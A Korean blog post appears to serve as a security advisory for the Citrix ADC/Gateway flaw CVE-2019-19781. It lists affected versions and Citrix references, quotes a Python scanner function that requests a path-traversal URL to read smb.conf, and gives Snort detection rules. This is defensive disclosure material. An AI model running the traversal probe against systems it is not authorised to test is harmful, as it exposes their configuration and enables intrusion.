티스토리 뷰

728x90
반응형

[CVE 취약점] Citrix ADC/Gateway 제품 원격코드 실행 취약점(CVE-2019-19781)


참조

https://github.com/trustedsec/cve-2019-19781/blob/master/cve-2019-19781_scanner.py

https://www.bleepingcomputer.com/news/security/citrix-adc-cve-2019-19781-exploits-released-fix-now/

https://support.citrix.com/article/CTX267679

https://support.citrix.com/article/CTX267027


Poc 

def check_server(target, targetport, verbose):

     try:

         print("Scanning for CVE-2019-19781 on: %s        " % target, end="\r") # Cleaning up output a little

         # if for some ungodly reason they are using HTTP

         if targetport == "80":

             url = ("http://%s:%s/vpn/js/../../%vpns/cfg/smb.conf" % (target,targetport))

             req = submit_url(url)


         # for all other requests use HTTPS

         else:

             url = ("https://%s:%s/vpn/js/../../vpns/cfg/smb.conf" % (target,targetport))

             req = submit_url(url)


         # if the system is still vulnerable

         if ("[global]") and ("encrypt passwords") and("name resolve order") in str(req.content): # each smb.conf will contain a [global] variable

             print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))

             vulnServers.append(target)

             return 1


개요

Citrix 社 제품에서 발생하는 취약점 주의 권고

공격자는 취약점을 악용하여 피해를 발생시킬 수 있으므로, 해당 Citrix 제품을 사용하는 이용자들은 해결 방안을 참고하여 조치 권고


Citrix의 ADC와 Gateway에서 공격자가 인증을 우회하여 임의코드를 실행할 수 있는 취약점(CVE-2019-19781)


영향 받는 제품 버전

- Citrix NetScaler ADC/NetScaler Gateway 10.5 버전

- Citrix ADC/NetScaler Gateway 11.1 버전

- Citrix ADC/NetScaler Gateway 12.0 버전

- Citrix ADC/NetScaler Gateway 12.1 버전

- Citrix ADC/Gateway version 13.0 버전

Critical(9.8)


방안

Citrix 홈페이지의 Solution 부분을 참고하여 임시 조치 수행

   ※ 해당 취약점이 해결된 패치 파일 공개 예정


Snort  

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; 
flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"/../"; 
http_raw_urireference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; 

flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"%2E%2E"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)




728x90
반응형
댓글
250x250
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today